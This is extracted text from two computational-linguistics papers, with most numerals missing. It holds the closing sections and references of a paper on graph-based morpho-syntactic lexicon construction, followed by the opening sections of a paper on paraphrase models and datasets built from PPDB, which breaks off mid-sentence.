related work we now review the areas of related work. lexicon generation. eskander et al. ( ) con- struct morpho-syntactic lexicons by incrementally merging inflectional classes with shared morpholog- ical features. natural language lexicons have often been created from smaller seed lexcions using var- ious methods. thelen and riloff ( ) use pat- terns extracted over a large corpus to learn semantic lexicons from smaller seed lexicons using bootstrap- ping. alfonseca et al. ( ) use distributional simi- larity scores across instances to propagate attributes using random walks over a graph. das and smith ( ) learn potential semantic frames for unknown predicates by expanding a seed frame lexicon. sen- timent lexicons containing semantic polarity labels for words and phrases have been created using boot- strapping and graph-based learning (banea et al., ; mohammad et al., ; velikovich et al., ; takamura et al., ; lu et al., ). graph-based learning. in general, graph-based semi-supervised learning is heavily used in nlp (talukdar and cohen, ; subramanya and taluk- dar, ). graph-based learning has been used for class-instance acquisition (talukdar and pereira, ), text classification (subramanya and bilmes, ), summarization (erkan and radev, ), structured prediction problems (subramanya et al., ; das and petrov, ; garrette et al., ) etc. our work differs from most of these approaches in that we specifically learn how different features shared between the nodes can correspond to either the propagation of an attribute or an inversion of the attribute value (cf. equ ). in terms of the ca- pability of inverting an attribute value, our method is close to goldberg et al. ( ), who present a framework to include dissimilarity between nodes and talukdar et al. ( ), who learn which edges can be excluded for label propagation. in terms of featurizing the edges, our work resembles previous work which measured similarity between nodes in terms of similarity between the feature types that they share (muthukrishnan et al., ; saluja and navrátil, ). our work is also related to graph- based metric learning, where the objective is to learn a suitable distance metric between the nodes of a graph for solving a given problem (weinberger et al., ; dhillon et al., ). morphology. high morphological complexity ex- acerbates the problem of feature sparsity in many nlp applications and leads to poor estimation of model parameters, emphasizing the need of mor- phological analysis. morphological analysis en- compasses fields like morphological segmentation (creutz and lagus, ; demberg, ; snyder and barzilay, ; poon et al., ; narasimhan et al., ), and inflection generation (yarowsky and wicentowski, ; wicentowski, ). such models of segmentation and inflection generation are used to better understand the meaning and re- lations between words. our task is complementary to the task of morphological paradigm generation. paradigm generation requires generating all possible morphological forms of a given base-form according to different linguistic transformations (dreyer and eisner, ; durrett and denero, ; ahlberg et al., ; ahlberg et al., ; nicolai et al., ; faruqui et al., ), whereas our task requires iden- tifying linguistic transformations between two dif- ferent word forms. low-resourced languages. our algorithm can be used to generate morpho-syntactic lexicons for low- resourced languages, where the seed lexicon can be constructed, for example, using crowdsourcing (callison-burch and dredze, ; irvine and kle- mentiev, ). 
morpho-syntactic resources have been developed for east european languages like slovene (dzeroski et al., ; erjavec, ), bulgarian (simov et al., ) and highly agglutinative languages like turkish (sak et al., ). morpho-syntactic lexicons are crucial components in acoustic modeling and automatic speech recognition, where they have been developed for low-resourced languages (huet et al., ; besacier et al., ). one alternative method to extract morpho-syntactic lexicons is via parallel data (das and petrov, ). however, such methods assume that both the source and target languages are isomorphic with respect to morphology. this can be the case with attributes like coarse part-of-speech or case, but is rarely true for other attributes like gender, which is very language specific. future work there are three major ways in which the current model can possibly be improved. joint learning and propagation. in the current model, we are first learning the weights in a supervised manner (§ . ) and then propagating labels across nodes in a semi-supervised step with fixed feature weights (§ . ). these can also be performed jointly: perform one iteration of weight learning, propagate labels using these weights, perform another iteration of weight learning assuming empirical labels as gold labels, and continue to learn and propagate until convergence. this joint learning would be slower than the current approach as propagating labels across the graph is an expensive step. multi-label classification. we are currently using the binary relevance method, which trains a binary classifier for every attribute independently (godbole and sarawagi, ; zhang and zhou, ), with paradigm projection as a post-processing step (§ . ). thus we are accounting for attribute correlations only at the end. we can instead model such correlations as constraints during the learning step to obtain better solutions (ghamrawi and mccallum, ; tsoumakas and katakis, ; fürnkranz et al., ; read et al., ). richer feature set. in addition, our model can benefit from a richer set of features. word embeddings can be used to connect word nodes which are similar in meaning (mikolov et al., ). we can use existing morphological segmentation tools to discover the morphemes and inflections of a word and connect it to words with similar inflections, which might be better than the crude suffix or prefix features. we can also use rich lexical resources like wiktionary to extract relations between words that can be encoded on our graph edges. conclusion we have presented a graph-based semi-supervised method to construct large annotated morpho-syntactic lexicons from small seed lexicons. our method is language independent and we have constructed lexicons for different languages. we showed that the lexicons thus constructed help improve performance in morphological tagging and dependency parsing, when used as features. acknowledgement this work was performed when the first author was an intern at google. we thank action editor alexander clark, and the three anonymous reviewers for their helpful suggestions in preparing the manuscript. we thank david talbot for his help in developing the propagation framework and helpful discussions about evaluation. we thank avneesh saluja, chris dyer and partha pratim talukdar for their comments on drafts of this paper.
references željko agić, maria jesus aranzabe, aitziber atutxa, cristina bosco, jinho choi, marie-catherine de marn- effe, timothy dozat, richárd farkas, jennifer foster, filip ginter, iakes goenaga, koldo gojenola, yoav goldberg, jan hajič, anders trærup johannsen, jenna https://www.wiktionary.org/ kanerva, juha kuokkala, veronika laippala, alessan- dro lenci, krister lindén, nikola ljubešić, teresa lynn, christopher manning, héctor alonso martı́nez, ryan mcdonald, anna missilä, simonetta monte- magni, joakim nivre, hanna nurmi, petya osenova, slav petrov, jussi piitulainen, barbara plank, prokopis prokopidis, sampo pyysalo, wolfgang seeker, moj- gan seraji, natalia silveira, maria simi, kiril simov, aaron smith, reut tsarfaty, veronika vincze, and daniel zeman. . universal dependencies . . lindat/clarin digital library at institute of formal and applied linguistics, charles university in prague. malin ahlberg, markus forsberg, and mans hulden. . semi-supervised learning of morphological paradigms and lexicons. in proc. of eacl. malin ahlberg, markus forsberg, and mans hulden. . paradigm classification in supervised learning of morphology. in proc. of naacl. enrique alfonseca, marius pasca, and enrique robledo- arnuncio. . acquisition of instance attributes via labeled and related instances. in proc. of sigir. ebru arisoy, murat saraçlar, brian roark, and izhak shafran. . syntactic and sub-lexical features for turkish discriminative language models. in proc. of icassp. carmen banea, janyce m. wiebe, and rada mihalcea. . a bootstrapping method for building subjectiv- ity lexicons for languages with scarce resources. in proc. of lrec. yoshua bengio, olivier delalleau, and nicolas le roux. . label propagation and quadratic criterion. in semi-supervised learning. mit press. laurent besacier, etienne barnard, alexey karpov, and tanja schultz. . automatic speech recogni- tion for under-resourced languages: a survey. speech communication, : – . bernd bohnet and joakim nivre. . a transition- based system for joint part-of-speech tagging and la- beled non-projective dependency parsing. in proc. of emnlp. chris callison-burch and mark dredze. . creat- ing speech and language data with amazon’s mechan- ical turk. in proc. of naacl workshop on creating speech and language data with amazon’s mechani- cal turk. alexander clark. . combining distributional and morphological information for part of speech induc- tion. in proc. of eacl. mathias creutz and krista lagus. . unsupervised models for morpheme segmentation and morphology learning. acm transactions on speech and language processing (tslp), ( ): . dipanjan das and slav petrov. . unsupervised part- of-speech tagging with bilingual graph-based projec- tions. in proc. of acl. dipanjan das and noah a. smith. . graph-based lexicon expansion with sparsity-inducing penalties. in proc. of naacl. marie-catherine de marneffe, timothy dozat, natalia silveira, katri haverinen, filip ginter, joakim nivre, and christopher d. manning. . universal stan- ford dependencies: a cross-linguistic typology. in proceedings of lrec. vera demberg. . a language-independent unsuper- vised model for morphological segmentation. in proc. of acl. pascal denis and benoı̂t sagot. . coupling an anno- tated corpus and a morphosyntactic lexicon for state- of-the-art pos tagging with less human effort. in proc. of paclic. paramveer s. dhillon, partha talukdar, and koby cram- mer. . metric learning for graph-based domain adaptation. in proc. of coling. markus dreyer and jason eisner. . 
discover- ing morphological paradigms from plain text using a dirichlet process mixture model. in proc. of emnlp. matthew s. dryer. . prefixing vs. suffixing in inflec- tional morphology. max planck institute for evolu- tionary anthropology. john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. the journal of machine learning research, : – . kais dukes and nizar habash. . morphological annotation of quranic arabic. in proc. of lrec. greg durrett and john denero. . supervised learn- ing of complete morphological paradigms. in proc. of naacl. saso dzeroski, tomaz erjavec, and jakub zavrel. . morphosyntactic tagging of slovene: evaluating tag- gers and tagsets. in proc. of lrec. tomaz erjavec. . multext-east version : multilin- gual morphosyntactic specifications, lexicons and cor- pora. in proc. of lrec. günes erkan and dragomir r. radev. . lexrank: graph-based lexical centrality as salience in text sum- marization. journal of artificial intelligence re- search, ( ): – . ramy eskander, nizar habash, and owen rambow. . automatic extraction of morphological lexicons from morphologically annotated corpora. in proc. of emnlp. manaal faruqui and sebastian padó. . training and evaluating a german named entity recognizer with se- mantic generalization. in proc. of konvens. manaal faruqui, yulia tsvetkov, graham neubig, and chris dyer. . morphological inflection gener- ation using character sequence to sequence learning. arxiv: . . chun-sung ferng and hsuan-tien lin. . multi- label classification with error-correcting codes. in proc. of acml. johannes fürnkranz, eyke hüllermeier, eneldo loza mencı́a, and klaus brinker. . multilabel classifi- cation via calibrated label ranking. machine learning, ( ): – . dan garrette, jason mielens, and jason baldridge. . real-world semi-supervised learning of pos-taggers for low-resource languages. in proc. of acl. nadia ghamrawi and andrew mccallum. . collec- tive multi-label classification. in proc. of cikm. jesús giménez and lluı́s marquez. . svmtool: a general pos tagger generator based on support vector machines. in proc. of lrec. shantanu godbole and sunita sarawagi. . discrim- inative methods for multi-labeled classification. in proc. of kdd. andrew b. goldberg, xiaojin zhu, and stephen j. wright. . dissimilarity in graph-based semi- supervised classification. in proc. of aistats. yoav goldberg, reut tsarfaty, meni adler, and michael elhadad. . enhancing unlexicalized parsing per- formance using a wide coverage lexicon, fuzzy tag-set mapping, and em-hmm-based lexical probabilities. in proc. of eacl. spence green and john denero. . a class-based agreement model for generating accurately inflected translations. in proc. of acl. jan hajič and barbora hladká. . tagging inflective languages: prediction of morphological categories for a rich, structured tagset. in proc. of coling. jan hajič. . morphological tagging: data vs. dictio- naries. in proc. of naacl. daniel hsu, sham kakade, john langford, and tong zhang. . multi-label prediction via compressed sensing. in proc. of nips. stéphane huet, guillaume gravier, and pascale sébillot. . morphosyntactic resources for automatic speech recognition. in proc. of lrec. ann irvine and alexandre klementiev. . using me- chanical turk to annotate lexicons for less commonly used languages. in proc. of naacl workshop on cre- ating speech and language data with amazon’s me- chanical turk. ernst ising. . beitrag zur theorie des ferromag- netismus. 
zeitschrift für physik a hadrons and nu- clei, ( ): – . reinhard kneser and hermann ney. . improved clustering techniques for class-based statistical lan- guage modelling. in proc. of eurospeech. dimitrios kokkinakis, maria toporowska-gronostaj, and karin warmenius. . annotating, disambiguat- ing & automatically extending the coverage of the swedish simple lexicon. in proc. of lrec. terry koo, xavier carreras, and michael collins. . simple semi-supervised dependency parsing. in proc. of acl. sandra kübler, ryan mcdonald, and joakim nivre. . dependency parsing. synthesis lectures on human language technologies. morgan & claypool publishers. yue lu, malu castellanos, umeshwar dayal, and chengxiang zhai. . automatic construction of a context-aware sentiment lexicon: an optimization ap- proach. in proc. of www. sven martin, jörg liermann, and hermann ney. . algorithms for bigram and trigram word clustering. speech communication, ( ): – . ryan mcdonald, joakim nivre, yvonne quirmbach- brundage, yoav goldberg, dipanjan das, kuzman ganchev, keith b. hall, slav petrov, hao zhang, os- car täckström, claudia bedini, núria b. castelló, and jungmee lee. . universal dependency annota- tion for multilingual parsing. in proc. of acl. tomas mikolov, wen-tau yih, and geoffrey zweig. . linguistic regularities in continuous space word representations. in proc. of naacl. einat minkov, kristina toutanova, and hisami suzuki. . generating complex morphology for machine translation. in proc. of acl. saif mohammad, cody dunne, and bonnie dorr. . generating high-coverage semantic orientation lexi- cons from overtly marked words and a thesaurus. in proc. of emnlp. robert moore. . an improved tag dictionary for faster part-of-speech tagging. in proc. of emnlp. thomas müller and hinrich schuetze. . robust morphological tagging with word representations. in proceedings of naacl. thomas müller, helmut schmid, and hinrich schütze. . efficient higher-order crfs for morphological tagging. in proc. of emnlp. pradeep muthukrishnan, dragomir radev, and qiaozhu mei. . simultaneous similarity learning and feature-weight learning for document clustering. in proc. of textgraphs. karthik narasimhan, regina barzilay, and tommi jaakkola. . an unsupervised method for uncov- ering morphological chains. transactions of the asso- ciation for computational linguistics, : – . garrett nicolai, colin cherry, and grzegorz kondrak. . inflection generation as discriminative string transduction. in proc. of naacl. sonja nießen and hermann ney. . statistical ma- chine translation with scarce resources using morpho- syntactic information. computational linguistics, ( ). kemal oflazer and ìlker kuruöz. . tagging and morphological disambiguation of turkish text. in proc. of anlp. olutobi owoputi, brendan o’connor, chris dyer, kevin gimpel, nathan schneider, and noah a. smith. . improved part-of-speech tagging for online conversa- tional text with word clusters. in proc. of naacl. tommi a pirinen. . modularisation of finnish finite- state language description—towards wide collabora- tion in open source development of a morphological analyser. in proc. of nodalida. hoifung poon, colin cherry, and kristina toutanova. . unsupervised morphological segmentation with log-linear models. in proc. of naacl. adwait ratnaparkhi. . a maximum entropy model for part-of-speech tagging. in proc. of emnlp. jesse read, bernhard pfahringer, geoff holmes, and eibe frank. . classifier chains for multi-label classification. machine learning, ( ): – . 
haşim sak, tunga güngör, and murat saraçlar. . turkish language resources: morphological parser, morphological disambiguator and web corpus. in proc. of anlp. avneesh saluja and jirı navrátil. . graph-based unsupervised learning of word similarities using het- erogeneous feature types. in proc. of textgraphs. helmut schmid. . probabilistic part-of-speech tag- ging using decision trees. in proc. of the international conference on new methods in language processing. kiril ivanov simov, petya osenova, sia kolkovska, elisaveta balabanova, and dimitar doikoff. . a language resources infrastructure for bulgarian. in proc. of lrec. noah a. smith, david a. smith, and roy w. tromble. . context-based morphological disambiguation with random fields. in proc. of emnlp. benjamin snyder and regina barzilay. . unsuper- vised multilingual learning for morphological segmen- tation. in proc. of acl. radu soricut and franz och. . unsupervised mor- phology induction using word embeddings. in proc. of naacl. amarnag subramanya and jeff bilmes. . soft- supervised learning for text classification. in proc. of emnlp. amarnag subramanya and partha pratim talukdar. . graph-based semi-supervised learning. synthesis lec- tures on artificial intelligence and machine learning, ( ). amarnag subramanya, slav petrov, and fernando pereira. . efficient graph-based semi-supervised learning of structured tagging models. in proc. of emnlp. oscar täckström, ryan mcdonald, and jakob uszkoreit. . cross-lingual word clusters for direct transfer of linguistic structure. in proc. of naacl. hiroya takamura, takashi inui, and manabu okumura. . extracting semantic orientations of phrases from dictionary. in proc. of naacl. partha pratim talukdar and william cohen. . scaling graph-based semi-supervised learning to large number of labels using count-min sketch. in proc. of aistats. partha pratim talukdar and fernando pereira. . experiments in graph-based semi-supervised learning methods for class-instance acquisition. in proc. of acl. partha pratim talukdar, derry wijaya, and tom mitchell. . acquiring temporal constraints between rela- tions. in proc. of cikm. michael thelen and ellen riloff. . a bootstrapping method for learning semantic lexicons using extraction pattern contexts. in proc. of acl. viktor trón, péter halácsy, péter rebrus, andrás rung, péter vajda, and eszter simon. . morphdb.hu: hungarian lexical database and morphological gram- mar. in proc. of lrec. grigorios tsoumakas and ioannis katakis. . multi- label classification: an overview. dept. of informat- ics, aristotle university of thessaloniki, greece. joseph turian, lev ratinov, and yoshua bengio. . word representations: a simple and general method for semi-supervised learning. in proc. of acl. jakob uszkoreit and thorsten brants. . distributed word clustering for large scale class-based language modeling in machine translation. in proc. of acl. leonid velikovich, sasha blair-goldensohn, kerry han- nan, and ryan mcdonald. . the viability of web- derived polarity lexicons. in proc. of naacl. fei wang, shijun wang, changshui zhang, and ole winther. . semi-supervised mean fields. in proc. of aistats. kilian q. weinberger, john blitzer, and lawrence k. saul. . distance metric learning for large mar- gin nearest neighbor classification. in proc. of nips. richard wicentowski. . multilingual noise-robust supervised morphological analysis using the word- frame model. in proc. of sigphon. david yarowsky and richard wicentowski. . 
min- imally supervised morphological analysis by multi- modal alignment. in proc. of acl. yue zhang and joakim nivre. . transition-based dependency parsing with rich non-local features. in proc. of acl. yi zhang and jeff g. schneider. . multi-label output codes using canonical correlation analysis. in proc. of aistats. min-ling zhang and zhi-hua zhou. . a k-nearest neighbor based algorithm for multi-label classifica- tion. in proc. of ieee conference on granular com- puting. xiaojin zhu. . semi-supervised learning with graphs. ph.d. thesis, carnegie mellon university, pittsburgh, pa, usa. aai . from paraphrase database to compositional paraphrase model and back john wieting∗ mohit bansal† kevin gimpel† karen livescu† ∗university of illinois at urbana-champaign, urbana, il, , usa wieting @illinois.edu †toyota technological institute at chicago, chicago, il, , usa {mbansal,kgimpel,klivescu}@ttic.edu abstract the paraphrase database (ppdb; ganitke- vitch et al., ) is an extensive semantic re- source, consisting of a list of phrase pairs with (heuristic) confidence estimates. however, it is still unclear how it can best be used, due to the heuristic nature of the confidences and its necessarily incomplete coverage. we propose models to leverage the phrase pairs from the ppdb to build parametric paraphrase models that score paraphrase pairs more accurately than the ppdb’s internal scores while simul- taneously improving its coverage. they allow for learning phrase embeddings as well as im- proved word embeddings. moreover, we in- troduce two new, manually annotated datasets to evaluate short-phrase paraphrasing mod- els. using our paraphrase model trained using ppdb, we achieve state-of-the-art results on standard word and bigram similarity tasks and beat strong baselines on our new short phrase paraphrase tasks. introduction paraphrase detection is the task of analyzing two segments of text and determining if they have the same meaning despite differences in structure and wording. it is useful for a variety of nlp tasks like question answering (rinaldi et al., ; fader et al., ), semantic parsing (berant and liang, ), textual entailment (bosma and callison- burch, ), and machine translation (marton et al., ). we release our datasets, code, and trained models at http://web.engr.illinois.edu/˜wieting /. see androutsopoulos and malakasiotis ( ) for a survey on approaches for detecting paraphrases. one component of many such systems is a para- phrase table containing pairs of text snippets, usu- ally automatically generated, that have the same meaning. the most recent work in this area is the paraphrase database (ppdb; ganitkevitch et al., ), a collection of confidence-rated paraphrases created using the pivoting technique of bannard and callison-burch ( ) over large parallel corpora. the ppdb is a massive resource, containing million paraphrase pairs. it captures many short paraphrases that would be difficult to obtain us- ing any other resource. for example, the pair {we must do our utmost, we must make every effort} has little lexical overlap but is present in ppdb. the ppdb has recently been used for monolingual align- ment (yao et al., ), for predicting sentence sim- ilarity (bjerva et al., ), and to improve the cov- erage of framenet (rastogi and van durme, ). though already effective for multiple nlp tasks, we note some drawbacks of ppdb. the first is lack of coverage: to use the ppdb to compare two phrases, both must be in the database. 
the second is that ppdb is a nonparametric paraphrase model; the number of parameters (phrase pairs) grows with the size of the dataset used to build it. in practice, it can become unwieldy to work with as the size of the database increases. a third concern is that the confidence estimates in ppdb are a heuristic combination of features, and their quality is unclear. we address these issues in this work by introducing ways to use ppdb to construct parametric paraphrase models. first we show that initial skip-gram word vectors (mikolov et al., a) can be fine-tuned for the paraphrase task by training on word pairs from ppdb. we call them paragram word vectors. we find additive composition of paragram vectors to be a simple but effective way to embed phrases for short-phrase paraphrase tasks. we find improved performance by training a recursive neural network (rnn; socher et al., ) directly on phrase pairs from ppdb. we show that our resulting word and phrase representations are effective on a wide variety of tasks, including two new datasets that we introduce. the first, annotated-ppdb, contains pairs from ppdb that were scored by human annotators. it can be used to evaluate paraphrase models for short phrases. we use it to show that the phrase embeddings produced by our methods are significantly more indicative of paraphrasability than the original heuristic scoring used by ganitkevitch et al. ( ). thus we use the power of ppdb to improve its contents. our second dataset, ml-paraphrase, is a re-annotation of the bigram similarity corpus from mitchell and lapata ( ). the task was originally developed to measure semantic similarity of bigrams, but some annotations are not congruent with the functional similarity central to paraphrase relationships. our re-annotation can be used to assess the paraphrasing capability of bigram compositional models. in summary, we make the following contributions: provide new paragram word vectors, learned using ppdb, that achieve state-of-the-art performance on the simlex- lexical similarity task (hill et al., b) and lead to improved performance in sentiment analysis. provide ways to use ppdb to embed phrases. we compare additive and rnn composition of paragram vectors. both can improve ppdb by re-ranking the paraphrases in ppdb to improve correlations with human judgments. they can be used as concise parameterizations of ppdb, thereby vastly increasing its coverage. we also perform a qualitative analysis of the differences between additive and rnn composition. introduce two new datasets. the first contains ppdb phrase pairs and evaluates how well models can measure the quality of short paraphrases. the second is a new annotation of the bigram similarity task in mitchell and lapata ( ) that makes it suitable for evaluating bigram paraphrases. we release the new datasets, complete with annotation instructions and raw annotations, as well as our code and the trained models. related work there is a vast literature on representing words as vectors. the intuition of most methods to create these vectors (or embeddings) is that similar words have similar contexts (firth, ).
earlier models made use of latent semantic analysis (lsa) (deer- wester et al., ). recently, more sophisticated neural models, work originating with (bengio et al., ), have been gaining popularity (mikolov et al., a; pennington et al., ). these embeddings are now being used in new ways as they are being tailored to specific downstream tasks (bansal et al., ). phrase representations can be created from word vectors using compositional models. simple but effective compositional models were studied by mitchell and lapata ( ; ) and blacoe and lapata ( ). they compared a variety of bi- nary operations on word vectors and found that simple point-wise multiplication of explicit vector representations performed very well. other works like zanzotto et al. ( ) and baroni and zampar- elli ( ) also explored composition using models based on operations of vectors and matrices. more recent work has shown that the extremely efficient neural embeddings of mikolov et al. ( a) also do well on compositional tasks simply by adding the word vectors (mikolov et al., b). hashimoto et al. ( ) introduced an alternative word embedding and compositional model based on predicate-argument structures that does well on two simple composition tasks, including the one intro- duced by mitchell and lapata ( ). an alternative approach to composition, used by socher et al. ( ), is to train a recursive neural network (rnn) whose structure is defined by a bi- narized parse tree. in particular, they trained their rnn as an unsupervised autoencoder. the rnn captures the latent structure of composition. recent work has shown that this model struggles in tasks in- volving compositionality (blacoe and lapata, ; hashimoto et al., ). however, we found suc- http://web.engr.illinois.edu/˜wieting / we also replicated this approach and found training to be time-consuming even using low-dimensional word vectors. http://web.engr.illinois.edu/~wieting / cess using rnns in a supervised setting, similar to socher et al. ( ), who used rnns to learn representations for image descriptions. the objec- tive function we used in this work was motivated by their multimodal objective function for learning joint image-sentence representations. lastly, the ppdb has been used along with other resources to learn word embeddings for several tasks, including semantic similarity, language mod- eling, predicting human judgments, and classifica- tion (yu and dredze, ; faruqui et al., ). concurrently with our work, it has also been used to construct paraphrase models for short phrases (yu and dredze, ). new paraphrase datasets we created two novel datasets: ( ) annotated- ppdb, a subset of phrase pairs from ppdb which are annotated according to how strongly they rep- resent a paraphrase relationship, and ( ) ml- paraphrase, a re-annotation of the bigram similarity dataset from mitchell and lapata ( ), again an- notated for strength of paraphrase relationship. . annotated-ppdb our motivation for creating annotated-ppdb was to establish a way to evaluate compositional para- phrase models on short phrases. most existing para- phrase tasks focus on words, like simlex- (hill et al., b), or entire sentences, such as the mi- crosoft research paraphrase corpus (dolan et al., ; quirk et al., ). to our knowledge, there are no datasets that focus on the paraphrasability of short phrases. 
thus, we created annotated-ppdb so that researchers can focus on local compositional phenomena and measure the performance of models directly, avoiding the need to do so indirectly in a sentence-level task. models that have strong performance on annotated-ppdb can be used to provide more accurate confidence scores for the paraphrases in the ppdb as well as reduce the need for large paraphrase tables altogether. annotated-ppdb was created in a multi-step process (outlined below) involving various automatic filtering steps followed by crowdsourced human annotation. one of the aims for our dataset was to collect a variety of paraphrase types: we wanted to include pairs that were non-trivial to recognize as well as those with a range of similarity and length. we focused on phrase pairs with limited lexical overlap to avoid including those with only trivial differences. we started with candidate phrases extracted from the first m pairs in the xxl version of the ppdb and then executed the following steps. filter phrases for quality: only those phrases whose tokens were in our vocabulary were retained. next, all duplicate paraphrase pairs were removed; in ppdb, these are distinct pairs that contain the same two phrases with the order swapped. filter by lexical overlap: next, we calculated the word overlap score in each phrase pair and then retained only those pairs that had a score of less than . . by word overlap score, we mean the fraction of tokens in the smaller of the phrases with levenshtein distance ≤ to a token in the larger of the phrases. this was done to exclude less interesting phrase pairs like 〈my dad had, my father had〉 or 〈ballistic missiles, of ballistic missiles〉 that only differ in a synonym or the addition of a single word. select range of paraphrasabilities: to balance our dataset with both clear paraphrases and erroneous pairs in ppdb, we sampled , examples from ten chunks of the first m initial phrase pairs where a chunk is defined as m phrase pairs. select range of phrase lengths: we then selected , phrases from each -example sample that encompassed a wide range of phrase lengths. to do this, we first binned the phrase pairs by their effective size. let n be the number of tokens of length greater than one character in the first phrase and n the same for the second phrase. then the effective size is defined as max(n , n ). the bins contained pairs of effective size of , , and or more, and pairs were selected from each bin. this gave us a total of , phrase pairs. prune to , : , phrase pairs were then selected randomly from the , remaining pairs to form an initial dataset, annotated-ppdb- k. (note that the confidence scores for phrase pairs in ppdb are based on a weighted combination of features with weights determined heuristically. the confidence scores were used to place the phrase pairs into their respective sets (s, m, l, xl, xxl, etc.), where each larger set subsumes all smaller ones. throughout, our vocabulary is defined as the most common k word types in english wikipedia, following tokenization and lowercasing (see § ).) the phrases were selected so that every phrase in the dataset was unique.
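a minimal sketch of the lexical-overlap filter and the effective-size computation used in the steps above follows. since the numeric cutoffs are not repeated here, they appear as parameters with placeholder defaults rather than the exact values used to build the dataset.

def levenshtein(a, b):
    # standard dynamic-programming edit distance between two tokens
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def word_overlap_score(phrase1, phrase2, max_edit=1):
    # fraction of tokens in the smaller phrase within max_edit edit distance
    # of some token in the larger phrase (max_edit is a placeholder cutoff)
    small, large = sorted([phrase1.split(), phrase2.split()], key=len)
    matched = sum(1 for s in small if any(levenshtein(s, l) <= max_edit for l in large))
    return matched / len(small)

def effective_size(phrase1, phrase2, min_token_len=2):
    # max over the two phrases of the number of tokens longer than one character
    n1 = sum(1 for t in phrase1.split() if len(t) >= min_token_len)
    n2 = sum(1 for t in phrase2.split() if len(t) >= min_token_len)
    return max(n1, n2)

pairs = [("my dad had", "my father had"), ("we must do our utmost", "we must make every effort")]
kept = [p for p in pairs if word_overlap_score(*p) < 0.5]   # 0.5 is a placeholder threshold
print(kept, [effective_size(*p) for p in pairs])            # only the second pair survives the filter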
annotate with mechanical turk: the dataset was then rated on a scale from - using amazon me- chanical turk, where a score of denoted phrases that are equivalent in a large number of contexts, meant that the phrases had some overlap in mean- ing, and indicated that the phrases were dissimilar or contradictory in some way (e.g., can not adopt and is able to accept). we only permitted workers whose location was in the united states and who had done at least , hits with a % acceptance rate. each example was labeled by annotators and their scores were averaged to produce the final rating. table shows some statistics of the data. overall, the annotated data had a mean deviation (md) of . . table shows that overall, workers found the phrases to be of high quality, as more than two-thirds of the pairs had an average score of at least . also from the ta- ble, we can see that workers had stronger agreement on very low and very high quality pairs and were less certain in the middle of the range. prune to , : to create our final dataset, annotated-ppdb, we selected , phrase pairs from the , annotations. we did this by first bin- ning the phrases into categories: those with scores in the interval [ , . ), those with scores in the in- terval [ . , . ], and those with scores in the interval ( . , ]. we took the phrase pairs with the low- est md in each bin, as these have the most agree- ment about their label, to form annotated-ppdb. these , examples were then randomly split into a development set of examples and a test set of , examples. the development set had an md of . and the test set had an md of . , indicating the final dataset had pairs of higher agreement than the initial , . . ml-paraphrase our second newly-annotated dataset, ml- paraphrase, is based on the bigram similarity task originally introduced by mitchell and lapata md is similar to standard deviation, but uses absolute value instead of squared value and thus is both more intuitive and less sensitive to outliers. score range md % of data [ , ) . . [ , ) . . [ , ) . . [ , ] . . table : an analysis of annotated-ppdb- k extracted from ppdb. the statistics shown are for the splits of the data accord- ing to the average score by workers. md denotes mean devia- tion and % of data refers to the percentage of our dataset that fell into each range. ( ); we refer to the original annotations as the ml dataset. the ml dataset consists of human similarity rat- ings for three types of bigrams: adjective-noun (jn), noun-noun (nn), and verb-noun (vn). through manual inspection, we found that the annotations were not consistent with the notion of similarity central to paraphrase tasks. for instance, television set and television programme were the highest rated phrases in the nn section (based on average anno- tator score). similarly, one of the highest ranked jn pairs was older man and elderly woman. this indi- cates that the annotations reflect topical similarity in addition to capturing functional or definitional simi- larity. therefore, we had the data re-annotated by two authors of this paper who are native english speak- ers. the bigrams were labeled on a scale from - where denotes phrases that are equivalent in a large number of contexts, indicates the phrases are roughly equivalent in a narrow set of contexts, and means the phrases are not at all equivalent in any context. following annotation, we collapsed the rat- ing scale by merging s and s together and s and s together. data ia ρ ia κ ml comp. ρ ml human ρ jn . . . . nn . . . . vn . . . . 
table : inter-annotator agreement of ml-paraphrase and com- parison with ml dataset. columns and show the inter- annotator agreement between the two annotators measured with spearman ρ and cohen’s κ. column shows the ρ between ml-paraphrase and all of the ml dataset. the last column is the average human ρ on the ml dataset. we tried using mechanical turk here, but due to such short phrases, with few having the paraphrase relationship, workers did not perform well on the task. statistics for the data are shown in table . we show inter-annotator spearman ρ and cohen’s κ in columns and , indicating substantial agreement on the jn and vn portions but only moderate agree- ment on nn. in fact, when evaluating our nn an- notations against those from the original ml data (column ), we find ρ to be . , well below the av- erage human correlation of . (final column) re- ported by mitchell and lapata and also surpassed by pointwise multiplication (mitchell and lapata, ). this suggests that the original nn portion, more so than the others, favored a notion of similar- ity more related to association than paraphrase. paraphrase models we now present parametric paraphrase models and discuss training. our goal is to embed phrases into a low-dimensional space such that cosine similarity in the space corresponds to the strength of the para- phrase relationship between phrases. we use a recursive neural network (rnn) similar to that used by socher et al. ( ). we first use a constituent parser to obtain a binarized parse of a phrase. for phrase p, we compute its vector g(p) through recursive computation on the parse. that is, if phrase p is the yield of a parent node in a parse tree, and phrases c and c are the yields of its two child nodes, we define g(p) recursively as follows: g(p) = f(w [g(c );g(c )] + b) where f is an element-wise activation function (tanh), [g(c );g(c )] ∈ r n is the concatenation of the child vectors, w ∈ rn× n is the composi- tion matrix, b ∈ rn is the offset, and n is the di- mensionality of the word embeddings. if node p has no children (i.e., it is a single token), we define g(p) = w (p) w , where ww is the word embedding matrix in which particular word vectors are indexed using superscripts. the trainable parameters of the model are w , b, and ww. . objective functions we now present objective functions for training on pairs extracted from ppdb. the training data con- sists of (possibly noisy) pairs taken directly from the original ppdb. in subsequent sections, we discuss how we extract training pairs for particular tasks. we assume our training data consists of a set x of phrase pairs 〈x ,x 〉, where x and x are assumed to be paraphrases. to learn the model parame- ters (w,b,ww), we minimize our objective function over the data using adagrad (duchi et al., ) with mini-batches. the objective function follows: min w,b,ww |x| ( ∑ 〈x ,x 〉∈x max( ,δ −g(x ) ·g(x ) + g(x ) ·g(t )) + max( ,δ −g(x ) ·g(x ) + g(x ) ·g(t )) ) + λw (‖w‖ +‖b‖ ) + λww ‖wwinitial −ww‖ ( ) where λw and λww are regularization parameters, wwinitial is the initial word embedding matrix, δ is the margin (set to in all of our experiments), and t and t are carefully-selected negative examples taken from a mini-batch during optimization. the intuition for this objective is that we want the two phrases to be more similar to each other (g(x ) ·g(x )) than either is to their respective neg- ative examples t and t , by a 